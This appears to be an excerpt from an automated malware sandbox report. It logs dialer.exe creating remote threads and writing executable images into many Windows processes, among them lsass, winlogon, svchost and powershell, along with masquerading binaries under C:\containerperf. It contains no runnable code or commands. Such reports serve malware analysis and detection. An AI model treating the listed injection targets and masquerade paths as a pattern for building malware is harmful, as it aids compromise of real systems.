                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1332908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1122908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B52908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BA2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B6562908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A602908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A8622908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D1E2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 117C2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 14EA2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 733A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 65CB2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E72908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E132908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F8172908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66022908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 113F2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 11962908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1BEF2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B8362908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E152908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F37F2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E3F2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 11AB2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 38512908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2BF32908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F3912908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 26782908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 38562908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2D062908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ABE92908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 772908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 42D82908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2D182908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D82908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD382908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B1D82908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 424C2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 42FA2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 168A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B1EA2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 15CC2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 36C2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6B302908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 15FE2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1192908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 574B2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 675A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4D342908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2692908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1C12908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DDA32908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DDC52908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\Conhost.exe EIP: 84CE2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0F22908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83002908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 70892908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 708C2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 689F2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 68A42908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F02908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1032908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1542908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1672908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AC282908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AC3A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B52908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B82908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A02908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F02908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 74422908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 76252908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DEAC2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DEBE2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 792908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\Conhost.exe EIP: 31962908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1BB02908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1512908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1D752908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 782908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1BB82908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D4E2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D542908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A78A2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7902908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 902908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\Conhost.exe EIP: B5AB2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 10B2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1412908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1C812908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 54532908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1D232908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 54812908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FF282908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1552908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FF412908
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\Conhost.exe EIP: 14902908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1CA42908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 11D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 19D2908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 88572908
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 801A2908
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtResumeThread: Indirect: 0x1AFF24CAJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeNtQuerySystemInformation: Direct from: 0x7FF79597722EJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtDeviceIoControlFile: Indirect: 0x1AFF2D4DJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtQueryDirectoryFile: Indirect: 0x1AFF255AJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtEnumerateKey: Indirect: 0x1AFF2A31Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtEnumerateValueKey: Indirect: 0x1AFF2AC1Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtEnumerateKey: Indirect: 0x1AFF29F9Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtEnumerateValueKey: Indirect: 0x1AFF2AF5Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeNtQuerySystemInformation: Indirect: 0x1AFF21FDJump to behavior
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEF80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166960000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 1390000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F49DCF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20AF95B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 24EBE490000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1F5E7FA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26F6BA40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20B657E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28453480000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Local\Temp\twain_32.exe base: 24B34510000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 216AAA70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1AFC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D4EDD40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 13ACAE60000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: BA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: 1330000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 1ACD1120000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: B50000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 1BB84960000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\lsass.exe base: BA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 18FB6560000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27F1A600000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1ECA8620000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A77D1E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C6117C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27614EA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15F733A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2D365CB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 11840E70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C67E130000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24CF8170000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CD66020000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 213113F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D211960000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25F1BEF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 18FB8360000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2047E150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDF37F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2C34E3F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C611AB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15038510000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D92BF30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDF3910000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1FB26780000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15038560000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1742D060000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 294ABE90000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: 770000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21442D80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1742D180000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\appcompat\powershell.exe base: D80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 14DDD380000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 278B1D80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 244424C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21442FA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1BE168A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 7D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 278B1EA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 244424F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 12615CC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 255036C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F56B300000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28115FE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 1190000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C1574B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2B5675A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2185C8F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C14D340000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25402690000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25CD1C10000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\Platform\sihost.exe base: 11C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 195DDA30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 195DDC50000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E984CE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 193F0F20000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19D83000000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 27E70890000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 27E708C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\chcp.com base: 1FD689F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\chcp.com base: 1FD68A40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: F00000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1030000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1540000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\containerperf\ServerComponenthostMonitorDll.exe base: 1670000 value starts with: 4D5A
